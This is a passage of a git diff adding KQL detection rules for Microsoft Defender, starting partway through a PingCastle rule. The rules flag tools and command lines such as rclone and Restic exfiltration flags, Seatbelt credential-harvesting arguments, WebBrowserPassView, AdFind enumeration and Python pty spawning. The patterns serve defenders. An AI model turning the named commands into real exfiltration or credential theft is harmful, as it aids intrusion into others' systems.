"9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a" or SHA256 startswith "c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275" or SHA256 startswith "1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b" or SHA256 startswith "768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2" or SHA256 startswith "1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae" or SHA256 startswith "606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6" or SHA256 startswith "b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a" or SHA256 startswith "ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1" or SHA256 startswith "9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559" or SHA256 startswith "c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2" or SHA256 startswith "a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef" or SHA256 startswith "84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d" or SHA256 startswith "c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524" or SHA256 startswith "01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b" or SHA256 startswith "9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b" or SHA256 startswith "63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629" or SHA256 startswith "2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358" or SHA256 startswith "7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca" or SHA256 startswith "e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea" or SHA256 startswith "dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172" or SHA256 startswith "dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4" or SHA256 startswith "8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2" or SHA256 startswith "5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66" or SHA256 startswith "e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27" or SHA256 startswith "75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41" or SHA256 startswith "56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1" or SHA256 startswith "f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0" or SHA256 startswith "845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8" or SHA256 startswith "9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d" or SHA256 startswith "5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726" or SHA256 startswith "37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90" or SHA256 startswith "ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5" or SHA256 startswith "3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140" or SHA256 startswith "d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87" or SHA256 startswith "63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892" or SHA256 startswith "47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054" or SHA256 startswith "7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd")) or FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
new file mode 100644
index 00000000..5debb7c9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
@@ -0,0 +1,10 @@
+// Title: PUA - PingCastle Execution From Potentially Suspicious Parent
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-01-11
+// Level: high
+// Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") or (InitiatingProcessCommandLine contains ":\\Perflogs\\" or InitiatingProcessCommandLine contains ":\\Temp\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" or InitiatingProcessCommandLine contains "\\AppData\\Roaming\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or ((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\"))) and (InitiatingProcessCommandLine contains ".bat" or InitiatingProcessCommandLine contains ".chm" or InitiatingProcessCommandLine contains ".cmd" or InitiatingProcessCommandLine contains ".hta" or InitiatingProcessCommandLine contains ".htm" or InitiatingProcessCommandLine contains ".html" or InitiatingProcessCommandLine contains ".js" or InitiatingProcessCommandLine contains ".lnk" or InitiatingProcessCommandLine contains ".ps1" or InitiatingProcessCommandLine contains ".vbe" or InitiatingProcessCommandLine contains ".vbs" or InitiatingProcessCommandLine contains ".wsf") and (FolderPath endswith "\\PingCastle.exe" or ProcessVersionInfoOriginalFileName =~ "PingCastle.exe" or ProcessVersionInfoProductName =~ "Ping Castle" or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql
new file mode 100644
index 00000000..150e4d9e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Potential PE Metadata Tamper Using Rcedit
+// Author: Micah Babinski
+// Date: 2022-12-11
+// Level: medium
+// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
+// False Positives:
+//   - Legitimate use of the tool by administrators or users to update metadata of a binary
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql b/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql
new file mode 100644
index 00000000..19b74866
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Process Hacker Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-10
+// Level: medium
+// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
+// Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
+// Threat actors abused older vulnerable versions to manipulate system processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543
+// False Positives:
+//   - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis
+
+DeviceProcessEvents
+| where FolderPath contains "\\ProcessHacker_" or FolderPath endswith "\\ProcessHacker.exe" or (ProcessVersionInfoOriginalFileName in~ ("ProcessHacker.exe", "Process Hacker")) or ProcessVersionInfoFileDescription =~ "Process Hacker" or ProcessVersionInfoProductName =~ "Process Hacker" or ((MD5 startswith "68F9B52895F4D34E74112F3129B3B00D" or MD5 startswith "B365AF317AE730A67C936F21432B9C71") or (SHA1 startswith "A0BDFAC3CE1880B32FF9B696458327CE352E3B1D" or SHA1 startswith "C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E") or (SHA256 startswith "D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F" or SHA256 startswith "BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql b/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql
new file mode 100644
index 00000000..4f9233c4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - Radmin Viewer Utility Execution
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_rclone_execution.kql b/KQL/rules/windows/process_creation/pua_rclone_execution.kql
new file mode 100644
index 00000000..4ed26d96
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_rclone_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - Rclone Execution
+// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
+// Date: 2021-05-10
+// Level: high
+// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql b/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql
new file mode 100644
index 00000000..5dcd00a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - Restic Backup Tool Execution
+// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration.
+// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.
+// If not legitimately used in the enterprise environment, its presence may indicate malicious activity.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, attack.t1567.002
+// False Positives:
+//   - Legitimate use of Restic for backup purposes within the organization.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sftp:" or ProcessCommandLine contains "rest:http" or ProcessCommandLine contains "s3:s3." or ProcessCommandLine contains "s3.http" or ProcessCommandLine contains "azure:" or ProcessCommandLine contains " gs:" or ProcessCommandLine contains "rclone:" or ProcessCommandLine contains "swift:" or ProcessCommandLine contains " b2:") and (ProcessCommandLine contains " init " and ProcessCommandLine contains " -r ")) or ((ProcessCommandLine contains "--password-file" and ProcessCommandLine contains "init" and ProcessCommandLine contains " -r ") or (ProcessCommandLine contains "--use-fs-snapshot" and ProcessCommandLine contains "backup" and ProcessCommandLine contains " -r "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql b/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql
new file mode 100644
index 00000000..945ac7af
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - RunXCmd Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+//   - Legitimate use by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec="
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql b/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql
new file mode 100644
index 00000000..82d72f38
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Seatbelt Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql b/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql
new file mode 100644
index 00000000..bff4da4a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql
@@ -0,0 +1,13 @@
+// Title: PUA - SoftPerfect Netscan Execution
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
+// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+//   - Legitimate administrator activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
new file mode 100644
index 00000000..469e6605
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
+// Author: frack113
+// Date: 2021-12-13
+// Level: high
+// Description: Detects active directory enumeration activity using known AdFind CLI flags
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002
+// False Positives:
+//   - Authorized administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_system_informer_execution.kql b/KQL/rules/windows/process_creation/pua_system_informer_execution.kql
new file mode 100644
index 00000000..d2f4d415
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_system_informer_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - System Informer Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-08
+// Level: medium
+// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543
+// False Positives:
+//   - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SystemInformer.exe" or ProcessVersionInfoOriginalFileName =~ "SystemInformer.exe" or ProcessVersionInfoFileDescription =~ "System Informer" or ProcessVersionInfoProductName =~ "System Informer" or (MD5 startswith "19426363A37C03C3ED6FEDF57B6696EC" or SHA1 startswith "8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC" or SHA256 startswith "8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql b/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql
new file mode 100644
index 00000000..f5495cb2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql
@@ -0,0 +1,14 @@
+// Title: PUA - TruffleHog Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: medium
+// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
+// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
+// False Positives:
+//   - Legitimate use of TruffleHog by security teams or developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\trufflehog.exe" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql b/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql
new file mode 100644
index 00000000..24861905
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - WebBrowserPassView Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: medium
+// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql
new file mode 100644
index 00000000..bbdbff02
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - Wsudo Suspicious Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-02
+// Level: high
+// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql
new file mode 100644
index 00000000..24b411db
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql
@@ -0,0 +1,10 @@
+// Title: Pubprn.vbs Proxy Execution
+// Author: frack113
+// Date: 2022-05-28
+// Level: medium
+// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql
new file mode 100644
index 00000000..11d7136c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql
@@ -0,0 +1,11 @@
+// Title: Python Function Execution Security Warning Disabled In Excel
+// Author: @Kostastsale
+// Date: 2023-08-22
+// Level: high
+// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
+// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " 0" and (ProcessCommandLine contains "\\Microsoft\\Office\\" and ProcessCommandLine contains "\\Excel\\Security" and ProcessCommandLine contains "PythonFunctionWarnings")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/python_inline_command_execution.kql b/KQL/rules/windows/process_creation/python_inline_command_execution.kql
new file mode 100644
index 00000000..f8f4b4ac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/python_inline_command_execution.kql
@@ -0,0 +1,12 @@
+// Title: Python Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Python libraries that use a flag starting with "-c". Filter according to your environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python")) or ((ProcessCommandLine contains "-W ignore::DeprecationWarning" and ProcessCommandLine contains "['install', '--no-cache-dir', '--no-index', '--find-links'," and ProcessCommandLine contains "'--upgrade', 'pip'") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python"))))) and (not(((ProcessCommandLine contains "<pip-setuptools-caller>" and ProcessCommandLine contains "exec(compile(") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft VS Code\\Code.exe", "C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql
new file mode 100644
index 00000000..a156ddbb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql
@@ -0,0 +1,10 @@
+// Title: Python Spawning Pretty TTY on Windows
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: high
+// Description: Detects python spawning a pretty tty
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql b/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql
new file mode 100644
index 00000000..fff4c787
--- /dev/null
+++ b/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql
@@ -0,0 +1,10 @@
+// Title: Query Usage To Exfil Data
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe"
\ No newline at end of file
